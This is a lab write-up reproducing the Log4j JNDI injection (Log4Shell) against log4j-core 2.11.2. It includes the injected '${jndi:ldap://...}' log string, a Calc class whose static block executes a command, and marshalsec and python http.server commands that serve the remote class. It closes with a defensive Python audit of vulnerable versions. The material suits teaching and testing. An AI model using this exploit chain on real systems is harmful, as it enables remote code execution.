Log4j Deserialization Analysis Notes
This_is_Y Lv6

Environment Setup

Create a new project directly in IDEA.

  • ubuntu 22.04
  • java version "1.8.0_102"
  • marshalsec-0.0.3-SNAPSHOT-all.jar (sha1 22f311752a1c6ce1102bcb199458c8d10118ae6e)
  • python3.x

pom.xml

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>

    <groupId>org.example</groupId>
    <artifactId>log4j</artifactId>
    <version>1.0-SNAPSHOT</version>

    <properties>
        <maven.compiler.source>8</maven.compiler.source>
        <maven.compiler.target>8</maven.compiler.target>
        <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
    </properties>
    <dependencies>
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-api</artifactId>
            <version>2.11.2</version>
        </dependency>
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-core</artifactId>
            <version>2.11.2</version>
        </dependency>
    </dependencies>

</project>

Main.java

package org.example;

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.core.Logger;

public class Main {
    private static final Logger logger = (Logger) LogManager.getLogger(Main.class);

    public static void main(String[] args) {
        System.out.println("Hello world!");
        // The logged message contains a JNDI lookup pointing at the lab LDAP server;
        // log4j-core 2.11.2 resolves it while formatting the message.
        logger.error("${jndi:ldap://192.168.146.213:9999/Calc}");
    }
}

Calc.java

// javac Calc.java
import java.lang.Runtime;
import java.lang.Process;

public class Calc {
    // The static initializer runs as soon as the class is loaded.
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"gnome-calculator"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

Compile Calc.java into Calc.class, then start a local web server with Python (sudo python3 -m http.server 8888), and after that start a JNDI service with marshalsec (java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://0.0.0.0:8888/#Calc" 9999).

Result:

[Screenshot: image-20240322212143201]
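
As an added example (not part of the original post), the following Python code audits the two preconditions this lab depends on: the log4j-core version declared in pom.xml and the Java 8 update level. The thresholds (log4j-core 2.15.0 with backports 2.12.2 and 2.3.1, Java 8u191) and all function names are assumptions not taken from the page, and releases before 2.0-beta9 are not distinguished.

```python
import re
import xml.etree.ElementTree as ET

NS = {"m": "http://maven.apache.org/POM/4.0.0"}
# Assumptions (not from the page): 2.15.0 is the first mainline log4j-core release
# that stops expanding lookups in message text; 2.12.2 and 2.3.1 are the backports.
FIXED_MAINLINE = (2, 15, 0)
FIXED_BACKPORTS = {(2, 12): 2, (2, 3): 1}
# Assumption: Java 8u191 is the first update that refuses LDAP remote codebases by default.
LDAP_CODEBASE_OFF = 191

# Constructed sample: the dependency section of the page's pom.xml.
SAMPLE_POM = """<project xmlns="http://maven.apache.org/POM/4.0.0"><dependencies>
  <dependency><groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-api</artifactId><version>2.11.2</version></dependency>
  <dependency><groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-core</artifactId><version>2.11.2</version></dependency>
</dependencies></project>"""


def log4j_core_version(pom_xml):
    """Return the declared log4j-core version as (major, minor, patch), or None."""
    for dep in ET.fromstring(pom_xml).iterfind(".//m:dependency", NS):
        coords = (dep.findtext("m:groupId", "", NS).strip(),
                  dep.findtext("m:artifactId", "", NS).strip())
        if coords == ("org.apache.logging.log4j", "log4j-core"):
            # A property reference such as ${log4j.version} does not match: None.
            m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", dep.findtext("m:version", "", NS).strip())
            return tuple(int(g or 0) for g in m.groups()) if m else None
    return None


def expands_message_lookups(version):
    """True if this log4j-core version still resolves ${jndi:...} inside messages."""
    backport_patch = FIXED_BACKPORTS.get(version[:2])
    if backport_patch is not None:
        return version[2] < backport_patch
    return version < FIXED_MAINLINE


def audit(pom_xml, java_version):
    """Report which of the two preconditions used by the lab are present."""
    findings = []
    core = log4j_core_version(pom_xml)
    if core and expands_message_lookups(core):
        findings.append("log4j-core %d.%d.%d resolves lookups in log messages" % core)
    m = re.fullmatch(r"1\.8\.0_(\d+)(?:-\S+)?", java_version.strip())
    if m and int(m.group(1)) < LDAP_CODEBASE_OFF:
        findings.append("Java 8u%s trusts remote LDAP codebases by default" % m.group(1))
    return findings
```

Calling `audit(SAMPLE_POM, "1.8.0_102")` with the environment listed above returns both findings; an empty list means neither precondition was detected from the inputs given.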

